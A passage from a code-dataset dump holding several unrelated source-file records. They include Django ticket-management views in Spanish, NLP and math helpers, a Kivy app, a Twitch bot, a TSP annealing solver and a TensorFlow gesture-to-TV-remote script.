functools import reduce\n\nclass TicketsListado(LoginRequiredMixin, ListView):\n model = TicketBase\n template_name = 'tickets/tickets_main.html'\n view_name = 'main'\n success_url = None\n\n def get_context_data(self, **kwargs):\n ret = super(TicketsListado, self).get_context_data(**kwargs)\n usuario = User.objects.get(username=self.request.user.username)\n\n # Busqueda de string\n\n query = self.request.GET.get('q')\n print(\"query: \" + str(query))\n if query:\n result = None\n query_list = query.split()\n result = result.filter(\n reduce(operator.and_,\n (Q(asignado_a__icontains=q) for q in query_list)) |\n reduce(operator.and_,\n (Q(depende_en___icontains=q) for q in query_list))\n )\n\n if usuario is not None:\n try:\n tickets = TicketBase.objects.filter(iniciado_por_id=usuario.id).exclude(status=3).values()\n ret['tickets'] = tickets\n except:\n ret['tickets'] = None\n try:\n tickets = TicketBase.objects.filter(asignado_a_id=usuario.id).exclude(status=3).values()\n ret['tickets_x_usuario'] = tickets\n except:\n ret['tickets_x_usuario'] = None\n\n try:\n tickets = TicketBase.objects.all().exclude(status=3).values()\n ret['tickets_todos'] = tickets\n except:\n ret['tickets_todos'] = None\n\n return ret\n\n def get_queryset(self):\n\n import operator\n\n from django.db.models import Q\n # import de reduce desde python 2 para hacer la busquerda mas rapido en django 1.6+\n from functools import reduce\n result = super(TicketsListado, self).get_queryset()\n print(str(result))\n query = self.request.GET.get('q')\n print(\"query es: \" + str(query))\n if query:\n query_list = query.split()\n\n \"\"\"\n result = result.filter(\n reduce(operator.and_,\n (Q(asignado_a__icontains=q) for q in query_list)) |\n reduce(operator.and_,\n (Q(depende_en__icontains=q) for q in query_list))\n )\n \"\"\"\n\n print(\"result es: \" + str(result))\n return result\n\ntickets = TicketsListado.as_view()\n\n#muestra tickets con datos\nclass TicketExpandidoView(UserPassesTestMixin,LoginRequiredMixin, UpdateView):\n template_name = 'tickets/ticket_expandido.html'\n redirect_field_name = 'next'\n view_name = 'ticketexpandido'\n success_url = None\n model = TicketBase\n fields = '__all__'\n #Cuantas por pagina para ListView\n paginate_by = 10\n slug_field = 'ticket_id'\n slug_url_kwarg = 'q'\n login_url = 'users:404'\n redirect_field_name = 'no_autorizado'\n\n def test_func(self):\n if self.request.user.is_staff:\n return True\n t = None\n try:\n t = TicketBase.objects.get(id=self.kwargs['pk'])\n return (str(t.iniciado_por_id) == str(self.request.user.id) or \\\n str(t.asignado_a_id) == str(self.request.user.id)) and \\\n t.status is not 3\n except:\n return False\n\n #def get_queryset(self):\n #return TicketBase.objects.get(id=self.request.ticketid)\n def post(self, request, *args, **kwargs):\n if request.POST:\n if '_editar_trabajo' in request.POST:\n # redireccionarlos a la pagina para actulizar presupuestos\n return redirect(to='actualizar_sin_presupuesto_previo', pk=self.kwargs['pk'])\n\n def get_context_data(self, **kwargs):\n context = super(TicketExpandidoView, self).get_context_data(**kwargs)\n print(str(self.object))\n #proveedor = Proveedor.objects.get(username=self.object.iniciado_por.username)\n #agregado porque si un query de django retorna null tira una excepcion, hay que manejarla de esta forma.\n try:\n proveedor = Proveedor.objects.get(username=self.object.iniciado_por.username)\n except ObjectDoesNotExist:\n proveedor = None\n context['proveedor'] = proveedor\n user = User.objects.get(username=self.object.iniciado_por.username)\n context['user'] = user\n context['seguimientos'] = Seguimiento.objects.filter(ticket_base_id=self.kwargs['pk'])\n try:\n ticket_trabajo = TicketAltaTrabajo.objects.get(ticket_relacionado_id=self.kwargs['pk'])\n if ticket_trabajo is not None:\n context['ticket'] = ticket_trabajo\n if ticket_trabajo.trabajo_relacionado.tipo in \"Sin presupuesto previo\":\n context['trabajo'] = TipoSinPresupuestoPrevio.objects.get(id=ticket_trabajo.trabajo_relacionado.id)\n elif ticket_trabajo.trabajo_relacionado.tipo in \"Con presupuesto previo\":\n context['trabajo'] = TipoPresupuestoPrevio.objects.get(id=ticket_trabajo.trabajo_relacionado.id)\n except ObjectDoesNotExist as e:\n print(\"Exception desde TicketExpandido: \" + str(e))\n try:\n ticket_trabajo = TicketAsignarProveedores.objects.get(ticket_relacionado_id=self.kwargs['pk'])\n if ticket_trabajo is not None:\n context['ticket'] = ticket_trabajo\n context['trabajo'] = ticket_trabajo.trabajo_relacionado\n except ObjectDoesNotExist as e:\n print(\"Exception desde TicketExpandido: \" + str(e))\n \"\"\"\n try:\n ticket_asignacion = TicketAsignarProveedores.objects.get(ticket_relacionado_id=self.kwargs['pk'])\n if proveedor is not None:\n iniciador = proveedor\n else:\n iniciador = user\n context['listado_proveedores'] = ticket_asignacion.listado_proveedores(iniciador)\n print(\"listado es: \" + str(context['listado_proveedores']))\n except ObjectDoesNotExist:\n print(\"no es ticket de asignacion_proveedores\")\n context['listado_proveedores'] = None\n \"\"\"\n #context['resultado'] = resultado\n #if self.request.user.is_superuser:\n return context\n\n\n \"\"\"\n Para boton de acceptacion de formulario para aplicante proveedor\n \"\"\"\n def post(self, request, *args, **kwargs):\n if request.POST:\n if '_aprobar' in request.POST:\n \"\"\"\n Agregar permisos...\n \"\"\"\n try:\n ticket = TicketBase.objects.get(id=self.kwargs['pk'])\n except Exception as e:\n return redirect(to='tickets:error_resolviendo_ticket')\n #Concurrencia\n #Primero revisar si el ticket esta RESUELTO / CERRADO / ESPERANDOCAMBIOSDELCLIENTE\n if ticket.status in [3,4,7,]:\n return redirect(to='tickets:error_resolviendo_ticket')\n else:\n ticket.save()\n ticket.resolver_ticket()\n return redirect(to='home')\n\n if '_avisar_cambios_realizados' in request.POST:\n \"\"\"\n Avisarle al administrador que realize los cambios solicitados\n \"\"\"\n try:\n ticket = TicketBase.objects.get(id=self.kwargs['pk'])\n except Exception as e:\n return redirect(to='tickets:error_resolviendo_ticket')\n ticket.save()\n ticket.avisar_cambios_realizados()\n return redirect(to='tickets:ticket_expandido',pk=self.kwargs['pk'])\n if '_aprobar_alta_trabajo' in request.POST:\n #aprobar alta de trabajo y generar ticket de asignacion de proveedores a trabajo\n try:\n ticket = TicketBase.objects.get(id=self.kwargs['pk'])\n except Exception as e:\n return redirect(to='tickets:error_resolviendo_ticket')\n\n # Concurrencia\n # Primero revisar si el ticket esta RESUELTO / CERRADO / ESPERANDOCAMBIOSDELCLIENTE\n if ticket.status in [3,4,7,]:\n return redirect(to='tickets:error_resolviendo_ticket')\n else:\n ticket.save()\n ticket.resolver_ticket()\n return redirect(to='tickets:ticket_expandido', pk=self.kwargs['pk'])\n if '_asignar_proveedores_a_trabajo' in request.POST:\n return redirect(to='tickets:ticket_expandido', pk=self.kwargs['pk'])\n if '_cambiar_a_sin_presupuesto_previo' in request.POST:\n ticket = TicketBase.objects.get(id=self.kwargs['pk'])\n ticket_alta = TicketAltaTrabajo.objects.get(ticket_relacionado_id=ticket.id)\n # buscamos el trabajo con el id del trabjo que se encuentra en ticket alta\n trabajo_conpp = ticket_alta.trabajo_relacionado\n # Metodo de resolucion\n # Nuevo trabajo sin presupuesto previo creado con datos del traajo con presupuesto previo\n trabajo_sinpp_nuevo = TipoSinPresupuestoPrevio()\n trabajo_sinpp_nuevo.tipo = \"Sin presupuesto previo\"\n trabajo_sinpp_nuevo.iniciado_por = self.request.user\n trabajo_sinpp_nuevo.proveedor_con_empresa = trabajo_conpp.proveedor_con_empresa\n trabajo_sinpp_nuevo.departamento = trabajo_conpp.departamento\n trabajo_sinpp_nuevo.direccion = trabajo_conpp.direccion\n trabajo_sinpp_nuevo.trabaja_fin_de_semanas = trabajo_conpp.trabaja_fin_de_semanas\n trabajo_sinpp_nuevo.save()\n # Poblar el nuevo trabajo sin presupuesto con tareas del trabajo con pre-presupuesto\n for tarea in trabajo_conpp.tareas_a_realizar.all():\n t = get_tarea_base(tarea.tipo)\n t.descripcion = tarea.descripcion\n t.con_materiales = tarea.con_materiales\n t.tipo = tarea.tipo\n t.save()\n trabajo_sinpp_nuevo.tareas_a_realizar.add(tarea)\n trabajo_sinpp_nuevo.save()\n # Guardar nuevo trabajo / Borrar datos del trabajo con presupuesto de la BD\n trabajo_sinpp_nuevo.save()\n borrar_tickets_asociados_a_trabajo(trabajo_conpp)\n trabajo_conpp.delete()\n return redirect(to='vista_previa_sin_presupuesto_previo', pk=trabajo_sinpp_nuevo.id)\n\n\nticketexpandido = TicketExpandidoView.as_view()\n\n\n\"\"\"\ndef get_queryset(self):\n\n import operator\n\n from django.db.models import Q\n #import de reduce desde python 2 para hacer la busquerda mas rapido en django 1.6+\n from functools import reduce\n result = super(TicketExpandidoView, self).get_queryset()\n\n query = self.request.GET.get('q')\n if query:\n query_list = query.split()\n result = result.filter(\n reduce(operator.and_,\n (Q(asignado_a__icontains=q) for q in query_list)) |\n reduce(operator.and_,\n (Q(depende_en___icontains=q) for q in query_list))\n )\n\n return result \"\"\"\n\n\n\nclass AgregarSeguimiento(UserPassesTestMixin,LoginRequiredMixin,CreateView):\n template_name = \"tickets/agregar_msg_seguimiento.html\"\n view_name = 'agregarseguimiento'\n model = Seguimiento\n form_class = FormularioSeguimiento\n login_url = 'users:404'\n redirect_field_name = 'no_autorizado'\n\n def test_func(self):\n t = None\n try:\n t = TicketBase.objects.get(id=self.kwargs['pk'])\n except:\n return False\n return str(t.iniciado_por_id) == str(self.request.user.id) \\\n or str(t.asignado_a_id) == str(self.request.user.id)\n\n #guardar formulario\n def get_context_data(self, **kwargs):\n context = super(AgregarSeguimiento, self).get_context_data(**kwargs)\n context[\"id\"] = self.kwargs['pk']\n return context\n\n def form_valid(self, form):\n data = form.cleaned_data\n idTicket = self.kwargs['pk']\n #Concurrencia / Si el ticket no existe -- El trabajo fue cancellado duranto este tiempo\n try:\n t = TicketBase.objects.get(id=idTicket)\n except Exception as e:\n print(\"Exception desde AgregarSeguimiento:\" + str(e))\n return redirect(to=\"users:404\")\n s = Seguimiento()\n s.comentario = data['comentario']\n s.titulo = data['titulo']\n s.ticket_base = t\n s.fecha = timezone.now()\n s.usuario = self.request.user\n s.save()\n # Agregar permiso temporario para que proveedor pueda cambiar sus datos\n #Esto se hace desde la actualizacion del ticket ahora\n #proveedor = Proveedor.objects.get(id=t.iniciado_por_id)\n #proveedor.seguimiento_proveedor()\n\n return redirect(to='tickets:ticket_expandido', pk=t.id)\n\n\nagregarseguimiento = AgregarSeguimiento.as_view()\n\n#Formulario para actualizar los tickets, a ser utilizado solo por usuario administrador\nclass ActualizarTicket(UserPassesTestMixin,LoginRequiredMixin,UpdateView):\n form_class = FormularioActualziarTicket\n view_name = 'actualizarticket'\n model = TicketBase\n template_name = 'tickets/actualizar_ticket.html'\n success_url = None\n login_url = 'users:404'\n redirect_field_name = 'no_autorizado'\n\n def test_func(self):\n try:\n TicketBase.objects.get(id=self.kwargs['pk'])\n except:\n return False\n return self.request.user.is_staff\n\n def get_context_data(self, **kwargs):\n ret = super(ActualizarTicket,self).get_context_data(**kwargs)\n if self.request.POST:\n formset = FormularioSeguimiento(self.request.POST)\n ret['seguimiento'] = formset\n idTicket = self.kwargs['pk']\n try:\n t = TicketBase.objects.get(id=idTicket)\n ret['ticket'] = t\n except Exception as e:\n print(\"Exception desde ActualizarTicket:\" + str(e))\n return redirect(to=\"users:404\")\n else:\n formset = FormularioSeguimiento()\n ret['seguimiento'] = formset\n idTicket = self.kwargs['pk']\n try:\n t = TicketBase.objects.get(id=idTicket)\n ret['ticket'] = t\n except Exception as e:\n print(\"Exception desde ActualizarTicket:\" + str(e))\n return redirect(to=\"users:404\")\n ret.update(self.kwargs)\n return ret\n\n def form_valid(self, form):\n context = self.get_context_data()\n formset = context['seguimiento']\n t = context['ticket']\n\n if formset.is_valid():\n data = formset.cleaned_data\n idTicket = self.kwargs['pk']\n #Concurrencia\n #Primero revisar si ticket esta en status CERRADO / RESUELTO / ESPERANDOCAMBIOSDESDECLIENTE\n if t is None or t.status in [3,4,7,]:\n return redirect(to='tickets:error_resolviendo_ticket')\n try:\n t = TicketBase.objects.get(id=idTicket)\n except Exception as e:\n return redirect(to='tickets:error_resolviendo_ticket')\n s = Seguimiento()\n s.comentario = data['comentario']\n s.titulo = data['titulo']\n s.ticket_base = t\n s.fecha = timezone.now()\n s.usuario = self.request.user\n ## Try con excepcion de concurrencia\n t = form.save()\n s.save()\n status = form.cleaned_data['status']\n t.cambiar_status(status,s)\n #Si el ticket es cambiado a status 7 o esperando cambios desde usuario darle la oportunidad al usuario de\n #hacer los cambios esperados por el ticket\n print(form.cleaned_data['status'])\n if form.cleaned_data['status'] == 7:\n t.habilitar_cambios_esperados()\n return redirect(to='tickets:ticket_expandido', pk=self.kwargs['pk'])\n else:\n return render_to_response(self.template_name, context, context_instance=RequestContext(self.request))\n\nactualizarticket = ActualizarTicket.as_view()\n\n\n\ndef error_resolviendo_ticket(request):\n response = render_to_response('pages/error_resolviendo_ticket.html', {},\n context_instance=RequestContext(request))\n return response\n","sub_path":"construct_star/tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"92981796","text":"import tfidf\r\nimport fio\r\nimport ILP_baseline as ILP\r\nimport SennaParser\r\nimport porter\r\n\r\nfrom ILP_baseline import stopwords\r\n\r\nstopwordfilename = \"../../../Fall2014/summarization/ROUGE-1.5.5/data/smart_common_words_stemmed.txt\"\r\n\r\ntfidfext = \".tfidf\"\r\nposext = '.pos'\r\n\r\nphraseext = \".key\" #a list\r\nstudentext = \".keys.source\" #json\r\ncountext = \".dict\" #a dictionary\r\n\r\ndef getWordPos(sentence, ngram, NoStopWords=True):\r\n words_pos = []\r\n \r\n tokens = [(porter.getStemming(word.token.lower()), word.pos) for word in sentence.words]\r\n \r\n N = len(tokens)\r\n for n in ngram:\r\n for i in range(N):\r\n if i+n > N: continue\r\n ngram = tokens[i:i+n]\r\n \r\n if not NoStopWords:\r\n words = [w for w,pos in ngram]\r\n pos = [pos for w,pos in ngram]\r\n words_pos.append((\" \".join(words), ' '.join(pos)))\r\n else:\r\n removed = True\r\n for w,pos in ngram:\r\n if w not in stopwords:\r\n removed = False\r\n \r\n if not removed:\r\n words = [w for w,pos in ngram]\r\n pos = [pos for w,pos in ngram]\r\n words_pos.append((\" \".join(words), ' '.join(pos)))\r\n \r\n return words_pos\r\n\r\ndef extact_pos(datadir, sennadatadir, np, ngram, sheets = range(0,12), types=['POI', 'MP', 'LP']):\r\n for i, sheet in enumerate(sheets):\r\n week = i + 1\r\n dir = datadir + str(week) + '/'\r\n \r\n for type in types:\r\n prefix = dir + type\r\n prefix = prefix + '.' + np \r\n \r\n dict = {}\r\n \r\n sennafile = sennadatadir + \"senna.\" + str(week) + \".\" + type + '.output'\r\n if not fio.IsExist(sennafile): continue\r\n \r\n sentences = SennaParser.SennaParse(sennafile)\r\n for s in sentences:\r\n words_pos = getWordPos(s, ngram)\r\n \r\n for w, pos in words_pos:\r\n dict[w] = pos\r\n \r\n pos_file = prefix + posext\r\n \r\n fio.SaveDict(dict, pos_file, SortbyValueflag = True)\r\n \r\nif __name__ == '__main__': \r\n datadir = \"../../data/ILP_Sentence_Supervised_FeatureWeighting/\"\r\n \r\n sennadatadir = \"../../data/senna/\"\r\n \r\n extact_pos(datadir, sennadatadir, np = 'sentence', ngram=[1,2])","sub_path":"get_ngram_pos.py","file_name":"get_ngram_pos.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"568723116","text":"nouns = [\n[['словарь', 'dictionary'], 'm', [], 'May not be male'],\n[['книга', 'book'], 'f', [], 'May not be male'],\n[['карандаш', 'pencil'], 'm', [], 'May not be male']]\n#(word, gender, exceptions, notes)\n#([word in Rus, word in Eng], 'm' 'f' 'n' or 'p', [[excep declination, exeption], [etc...]], 'notes')\n\nverbs = [\n[['читать', 'to read', 'почитать'], 'e', [], 'Check impf'],\n[['писать', 'to write', 'написать'], 'e', [], 'Check impf']]\n#(word, conjugation, exceptions, notes)\n#([impf word in Rus, word in Eng, perf word in Rus], 'e' or 'i', [[exep tence, exeption], [etc...]], 'notes')\n\nadjective = [\n[['большой', 'big'], [], ''],\n[['хороший', 'good'], [], '']]\n#(word, exceptions, notes)\n#([word in Rus, word in Eng], [[exep case, exeption], [etc...]], 'notes')\n\nadverb = [\n[['плохо', 'bad'], [], ''],\n[['сегодня', 'today'], [], '']]\n#(word, exceptions, notes)\n#([word in Rus, word in Eng], [[exep case, exeption], [etc...]], 'notes')\n","sub_path":"Slovar.py","file_name":"Slovar.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"214301183","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\ndef haar(x):\n\tres = np.zeros(len(x))\n\tindex = (0 <= x) & (x <=1)\n\tres[index] = 1.0\n\treturn res \n\n\ndef plot_matrix(matrix):\n\tmatrix[abs(matrix)< 1e-6] = 0.0\n\tplt.spy(matrix, markersize = 2)\n\tplt.show() \n\ndef counter_identity(n):\n\treturn np.eye(n)[::-1]\n\n\ndef spline_support( k, j, d):\n\t\"\"\" Provides the support of spline indexed by 'k' in \n\tthe Schoenberg spline basis of degree d on [0,1] \n\twith detail level 'j'\n\t\"\"\" \n\tif (k+d) <= d-1:\n\t\tl1 = 0\n\t\tl2 = 2**(-j)*(k+d)\n\telif (k+d) <= 2**j:\n\t\tl1 = 2**(-j)*k\n\t\tl2 = 2**(-j)*(k+d)\n\telse:\n\t\tl1 = 2**(-j)*k \n\t\tl2 = 1\n\n\treturn l1, l2 \n\n","sub_path":"src/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"231241450","text":"# from io import StringIO\nimport os\nimport sys\nfrom pathlib import Path\n\nfrom kivy.app import App\nfrom kivy.uix.gridlayout import GridLayout\n# from kivy.uix.togglebutton import ToggleButton\nfrom kivy.properties import StringProperty, BooleanProperty\n\n\nroot_path: Path = os.path.split((os.path.dirname(__file__)))[0]\nsys.path.append(root_path)\n# for import of Fonts dir\nfont_path: Path = os.path.join(root_path, f'Main/Fonts{os.sep}')\nimage_path: Path = os.path.join(root_path, f'Main/images{os.sep}')\n\n\nclass WidgetsExamples(GridLayout):\n count = 0\n count_enabled = BooleanProperty(False)\n my_text = StringProperty(\"0\")\n text_input_str = StringProperty(\"foo\")\n # slider_value_txt = StringProperty(\"0\")\n font_lcd: Path = os.path.join(font_path, \"Lcd.ttf\")\n image_bg1: Path = os.path.join(image_path, \"bg1.jpg\")\n print(image_bg1)\n\n def on_button_click(self):\n # print(\"Button clicked\")\n if self.count_enabled:\n self.count += 1\n self.my_text = str(self.count)\n\n def on_toggle_button_state(self, widget):\n # print(\"toggle state\" + widget.state)\n if widget.state == \"normal\":\n widget.text = \"OFF\"\n self.count_enabled = False\n else:\n widget.text = \"ON\"\n self.count_enabled = True\n\n def on_switch_active(self, widget):\n print(\"Switch: \" + str(widget.active))\n\n def on_text_validate(self, widget):\n self.text_input_str = widget.text\n\n\nclass TheLabApp(App):\n pass\n\n\nTheLabApp().run()\n","sub_path":"TheLab_03_TextInput/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"31855890","text":"# -*- coding: utf-8 -*-\nimport codecs\nimport csv\nimport json\nimport os\nimport zipfile\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.utils.translation import ugettext as _\nfrom frame.models import Token\nfrom django.contrib.auth.models import User\nfrom tools.utils import json_response\nfrom tools.iam_client import user_list\nfrom django.conf import settings\nfrom tools.record_opr_log import getLogger\nfrom celery import task as celery_task\nfrom resource.utils import get_scope_label_by_ip\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nlogger = getLogger()\n\n\n@celery_task\ndef exports_resource(body):\n \"\"\"\n 导出excel表格\n \"\"\"\n logger.info('Begin to export group')\n\n sort = body.get(\"sort\").encode(\"utf-8\")\n search_list = body.get(\"search_list\").encode(\"utf-8\")\n search_keyword = body.get(\"search_keyword\", '{}').encode(\"utf-8\")\n page = int(body.get(\"page\", 1))\n username = body.get(\"username\").encode(\"utf-8\")\n id = body.get(\"id\", 1)\n size = int(body.get(\"size\", 20))\n\n\n if not page or not size:\n logger.info('parameters error: page or size can not be emtpy.')\n return json_response({'status': -1, 'error': 'parameters error: page or size can not be emtpy.'})\n\n to = str(user_list(username)[0].get('email')).split(\",\")\n\n the_file_name = \"downlaod.csv\"\n the_file_name_zip = u'downlaod' + '.zip'\n subject, from_email = u\"资源导出报表\", u\"云眼数据<%s>\" % settings.DEFAULT_FROM_EMAIL\n bod = render_to_string(\"export_report.html\")\n msg = EmailMultiAlternatives(subject=subject, body=bod, from_email=from_email, to=to)\n msg.attach_alternative(bod, 'text/html')\n f = open(the_file_name, 'wb')\n f.write(codecs.BOM_UTF8)\n writer = csv.writer(f)\n writer.writerow(\n [_(u\"id\"),\n _(u\"名称\"),\n _(u\"IP地址\"),\n _(u\"CPU(核数)\"),\n _(u\"内存(GB)\"),\n _(u\"磁盘(GB)\"),\n _(u\"操作系统\"),\n _(u\"所属业务\"),\n _(u\"所属分组\"),\n _(u\"入CMDB时间\")])\n\n request_dict = {\"id\": id, \"page\": page, \"size\": size, \"sort\": sort, \"search_list\": search_list,\n \"search_keyword\": search_keyword}\n\n from views import get_group_member_list\n result = get_group_member_list(request_dict)\n resource_list = []\n if result.status_code == 200:\n r = json.loads(result.content)\n resource_list = r.get('item_list')\n\n for resource_info in resource_list:\n writer.writerow(\n [_get_value(resource_info, 'model_id')\n , _get_value(resource_info, 'hostname')\n , _get_value(resource_info, 'ip')\n , _get_value(resource_info, 'cpu')\n , _get_value(resource_info, 'memory')\n , _get_value(resource_info, 'hard_disk')\n , _get_value(resource_info, 'os')\n , get_scope_label_by_ip(_get_value(resource_info, 'ip'), None)\n , _get_value(resource_info, 'groups')\n , _get_value(resource_info, 'cmdb_time')\n ])\n\n f.close()\n z = zipfile.ZipFile(the_file_name_zip, 'w', zipfile.ZIP_DEFLATED)\n z.write(the_file_name)\n z.close()\n msg.attach_file(the_file_name_zip)\n msg.send()\n os.remove(the_file_name_zip)\n os.remove(the_file_name)\n logger.info(\"export_resource success!\")\n\n\ndef _get_value(resource_info, name):\n label_str = u\"\"\n try:\n value = resource_info.get(name)\n if value:\n label_str = value\n else:\n label_str = \"\"\n except Exception as e:\n logger.error(\"_get_value error:%s\" % (str(e)))\n return label_str\n","sub_path":"WiseEye/cmdb_back/resource/rscgroup/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482235693","text":"import maya.cmds as cmds\ndef centerParent(parent1, parent2, child, offset):\n\tif child == None:\n\t\tchild = cmds.spaceLocator(n='_TEMP_LOC_')\n\t\tcmds.refresh()\n\t\tconstraint = cmds.parentConstraint(parent1, parent2, child, n='_TEMP_CONSTRAINT_', mo=False)\n\t\tcmds.refresh()\n\t\tlocation = cmds.xform(child, q=True, t=True)\n\t\tlocation = [location[0], location[1], location[2] + (location[0] + location[1]) * offset * -1]\n\t\tcmds.refresh()\n\t\tcmds.delete(child, constraint)\n\t\tcmds.refresh()\n\t\treturn location\n\telse:\n\t\tconstraint = cmds.parentConstraint(parent1, parent2, n=child + 'beingPlaced_', mo=False)\n\t\tcmds.delete(constraint)\n\n\ndef snap(child, parent, r=False):\n\tif r == True:\n\t\tcmds.parentConstraint(child, parent, mo=False, sr=['x', 'y', 'z'], n='deleteMe' + parent + child)\n\telse:\n\t\tcmds.parentConstraint(child, parent, mo=False, n='deleteMe' + parent + child)\n\tcmds.delete('deleteMe' + parent + child)","sub_path":"core/toolKit.py","file_name":"toolKit.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"574430462","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"Main bot file for Kappa Deep.\"\"\"\n\nfrom twitchio.ext import commands\n\nfrom config import config\nfrom tokens import tokens\n\nstartup_extensions = ['extensions.general',\n 'extensions.obs',\n 'extensions.sfx',\n 'extensions.skyline',\n 'extensions.streamelements']\n\nbot = commands.Bot(irc_token=tokens.TWITCH_TOKEN,\n nick=config.NICK,\n prefix=config.PREFIX,\n initial_channels=[config.CHAN])\n\n\n@bot.event\nasync def event_ready():\n \"\"\"Run when bot loads.\"\"\"\n msg = f'{config.NICK} ready for duty! Batteries not included.'\n print(msg)\n\n@bot.event\nasync def event_message(message):\n \"\"\"Print messages.\"\"\"\n # print(message._raw_data)\n\n await bot.handle_commands(message)\n\nif __name__ == '__main__':\n for extension in startup_extensions:\n try:\n bot.load_module(extension)\n except Exception as e:\n exc = '{}: {}'.format(type(e).__name__, e)\n print(f'[ERR] Can\\'t load extension {extension}\\n{exc}')\n\nbot.run()","sub_path":"bot_old2.py","file_name":"bot_old2.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"60879465","text":"import random\nimport numpy as np\n\nfrom abs_slr import Abs_slr\nfrom utils.solver_core import simanneal_solve\nfrom utils.funcs import fit_func\nfrom simanneal import Annealer\n\n\nclass Simanneal_slr(Abs_slr):\n _max_iter = None\n\n def __init__(self, max_iter=100):\n super(Simanneal_slr, self).__init__()\n self._max_iter = max_iter\n\n def solve(self, inst, fit_f=None):\n init_sln = np.random.permutation(inst.n)\n\n slr = Func_Annealer(init_sln, inst.dist_mat, fit_f=fit_f)\n slr.steps = self._max_iter\n slr.copy_strategy = 'slice'\n tour, fit = slr.anneal()\n\n head = np.where(tour == 0)[0][0]\n tour = tour[np.arange(head - inst.n, head)]\n\n return {'tour': tour, 'fitness': fit}\n\n\nclass Func_Annealer(Annealer):\n\n \"\"\"Test annealer with a travelling salesman problem.\n \"\"\"\n\n # pass extra data (the distance matrix) into the constructor\n def __init__(self, state, dist_mat, fit_f):\n self.dist_mat = dist_mat\n if fit_f is None:\n self._fit_f = fit_func\n else:\n self._fit_f = fit_f\n super(Func_Annealer, self).__init__(state) # important!\n\n def move(self):\n \"\"\"Swaps two cities in the route.\"\"\"\n a = random.randint(0, len(self.state) - 1)\n b = random.randint(0, len(self.state) - 1)\n self.state[a], self.state[b] = self.state[b], self.state[a]\n\n def energy(self):\n \"\"\"Calculates the length of the route.\"\"\"\n return self._fit_f(self.dist_mat, self.state)\n","sub_path":"solver/simanneal_slr.py","file_name":"simanneal_slr.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"595778263","text":"import cv2\nimport os\nimport tensorflow as tf\nimport pathlib\nimport numpy as np\nfrom object_detection.utils import config_util\nfrom object_detection.builders import model_builder\nfrom object_detection.utils import label_map_util\nfrom object_detection.protos import pipeline_pb2\nfrom object_detection.utils import visualization_utils as viz_utils\nfrom picamera import PiCamera\nfrom picamera.array import PiRGBArray\nimport time\nimport io\nfrom matplotlib import pyplot as plt\nimport vlc\nimport tf_record as xc\n\n\ndef give_command(command): #tv komut numaraları \n switcher = {\n 1: \"bir\",\n 2: \"iki\",\n 3: \"uc\",\n 4: \"dort\",\n 5: \"bes\",\n 6: \"alti\",\n 7: \"yedi\",\n 8: \"sekiz\",\n 9: \"dokuz\",\n 10: \"sifir\",\n 11: \"kanalartir\",\n 12: \"kanalazalt\",\n 13: \"sesac\",\n 14: \"seskapa\",\n 15: \"ackapa\"\n }\n return switcher.get(command)\n\ndef lets_change(command):\n switch_command = {\n 1: \"irsend SEND_ONCE Toshiba KEY_1\",\n 2: \"irsend SEND_ONCE Toshiba KEY_2\",\n 3: \"irsend SEND_ONCE Toshiba KEY_3\",\n 4: \"irsend SEND_ONCE Toshiba KEY_4\",\n 5: \"irsend SEND_ONCE Toshiba KEY_5\",\n 6: \"irsend SEND_ONCE Toshiba KEY_6\",\n 7: \"irsend SEND_ONCE Toshiba KEY_7\",\n 8: \"irsend SEND_ONCE Toshiba KEY_8\",\n 9: \"irsend SEND_ONCE Toshiba KEY_9\",\n 10: \"irsend SEND_ONCE Toshiba KEY_0\",\n 11: \"irsend SEND_ONCE Toshiba KEY_CHANNELUP\",\n 12: \"irsend SEND_ONCE Toshiba KEY_CHANNELDOWN\",\n 13: \"irsend SEND_ONCE Toshiba KEY_VOLUMEUP\",\n 14: \"irsend SEND_ONCE Toshiba KEY_VOLUMEDOWN\",\n 15: \"irsend SEND_ONCE Toshiba KEY_POWER\"\n }\n return switch_command.get(command)\n \n\nconfig = config_util.get_configs_from_pipeline_file('/home/pi/Desktop/tsfw/tffiles/modeller/modelimiz/ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8/pipeline.config')\n\nconfigs = config_util.get_configs_from_pipeline_file('/home/pi/Desktop/tsfw/tffiles/modeller/modelimiz/ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8/pipeline.config')\ndetection_model = model_builder.build(model_config=configs['model'], is_training=False)\n\nckpt = tf.train.Checkpoint(model=detection_model)\nckpt.restore(os.path.join('/home/pi/Desktop/tsfw/tffiles/modeller/modelimiz/ssd_mobilenet_v2_fpnlite_320x320_coco17_tpu-8/', 'ckpt-13')).expect_partial()\n\n\n@tf.function\ndef detect_fn(image):\n image, shapes = detection_model.preprocess(image)\n prediction_dict = detection_model.predict(image, shapes)\n detections_1 = detection_model.postprocess(prediction_dict, shapes) #bu satır\n return detections_1\n \n\ncategory_index = 